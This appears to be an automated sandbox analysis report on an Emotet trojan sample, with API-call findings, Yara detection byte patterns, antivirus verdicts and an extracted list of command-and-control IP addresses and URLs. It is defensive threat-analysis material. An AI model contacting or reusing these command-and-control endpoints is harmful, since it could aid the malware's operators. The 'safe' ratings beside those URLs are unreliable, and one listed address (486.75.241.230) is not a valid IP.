Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_00422057 _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_0045FEEF GetLocaleInfoA
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_0229E1F7 cpuid
Queries the volume information (name, serial number etc.) of a device
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\leelsensor.exe; Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_0045D811 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Contains functionality to query time zone information
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_0045E9DE __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson
Contains functionality to query Windows version
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_00416CBB __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,_DebugHeapAllocator,CoInitializeEx,CoCreateInstance
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match; File source: 00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_0043A7E0 __cftof,CreateFileMoniker,CreateBindCtx,lstrlenA,CreateGenericComposite
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_00418B2A CreateBindCtx,_wcslen,CoTaskMemFree
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_00419590 __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_0043A7E0 __cftof,CreateFileMoniker,CreateBindCtx,lstrlenA,CreateGenericComposite
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_00418B2A CreateBindCtx,_wcslen,CoTaskMemFree
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_00419590 __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree

Malware Configuration

Threatname: Emotet

{"C2 list": ["59.103.164.174/zeZ30sx6u6cxuuD", "59.110.18.236:443", "206.81.10.215:8080", "107.2.2.28/FpU6cre", "107.2.2.28/537", "486.75.241.230/8HPGE9Y", "486.75.241.230/8HPGE9bD", "190.12.119.180:443", "45.56.88.91:443", "47.50.251.130/HLHvQpxstemprof", "47.50.251.130/HLHvQpx", "186.75.241.230/8HPGE9", "186.75.241.230/8HPGE9bD", "51.68.220.244/THUbD", "51.68.220.244:8080", "88.91.88.91:443"]}

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
n5hhkdky_exe.exe | 79% | Virustotal |
n5hhkdky_exe.exe | 62% | Metadefender |
n5hhkdky_exe.exe | 81% | ReversingLabs | Win32.Trojan.Emotet
n5hhkdky_exe.exe | 100% | Avira | TR/AD.Emotet.ebaw

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
4.0.n5hhkdky_exe.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.ebaw
1.0.n5hhkdky_exe.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.ebaw
8.0.leelsensor.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.ebaw
5.0.leelsensor.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.ebaw

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://45.56.88.91:443/dIcDsclHnHkYC8AHTsU | 0% | Avira URL Cloud | safe
http://59.110.18.236:443/kwTaaZ8qRHU2 | 0% | Avira URL Cloud | safe
http://51.68.220.244/THUbD | 0% | Avira URL Cloud | safe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRH0 | 0% | Avira URL Cloud | safe
http://206.81.10.215:8080/bAvwkbqP | 0% | Avira URL Cloud | safe
http://47.50.251.130/HLHvQpx/ | 0% | Avira URL Cloud | safe
http://51.68.220.244:8080/THUbD | 0% | Avira URL Cloud | safe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRHONVf | 0% | Avira URL Cloud | safe
http://186.75.241.230/8HPGE9bD | 0% | Avira URL Cloud | safe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRH | 0% | Avira URL Cloud | safe
http://47.50.251.130/HLHvQpx | 0% | Avira URL Cloud | safe
http://186.75.241.230/8HPGE9 | 0% | Avira URL Cloud | safe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRH= | 0% | Avira URL Cloud | safe
http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUa | 0% | Avira URL Cloud | safe
http://107.2.2.28/FpU6cre | 0% | Avira URL Cloud | safe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRHM | 0% | Avira URL Cloud | safe
http://206.81.10.215:8080/bAvwkbqp | 0% | Avira URL Cloud | safe
http://190.12.119.180:443/tovm2Xky7BQG8IM | 0% | Avira URL Cloud | safe
http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUu | 0% | Avira URL Cloud | safe
http://206.81.10.215:8080/bAvwkbq | 0% | Avira URL Cloud | safe
http://47.50.251.130/HLHvQpxstemprofile | 0% | Avira URL Cloud | safe
http://206.81.10.215:8080/bAvwkbq8 | 0% | Avira URL Cloud | safe
http://206.81.10.215:8080/bAvwkbq6 | 0% | Avira URL Cloud | safe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRH) | 0% | Avira URL Cloud | safe
https://45.56.88.91:443/dIcDsclHnHkYC8AHTsU | 0% | Avira URL Cloud | safe
http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUy | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.2129758343.0000000002251000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 26 02 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 0C 3C 26 02 A3 08 3C 26 02 39 05 60 03 26 02 74 18 40 A3 08 3C 26 02 83 3C C5 60 03 ...
00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
  • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
  • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
  • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B F9 00 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 0C 3C F9 00 A3 08 3C F9 00 39 05 60 03 F9 00 74 18 40 A3 08 3C F9 00 83 3C C5 60 03 ...
00000004.00000002.2217330975.00000000022B1000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 2C 02 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 0C 3C 2C 02 A3 08 3C 2C 02 39 05 60 03 2C 02 74 18 40 A3 08 3C 2C 02 83 3C C5 60 03 ...
00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B FA 00 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 0C 3C FA 00 A3 08 3C FA 00 39 05 60 03 FA 00 74 18 40 A3 08 3C FA 00 83 3C C5 60 03 ...
00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
  • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.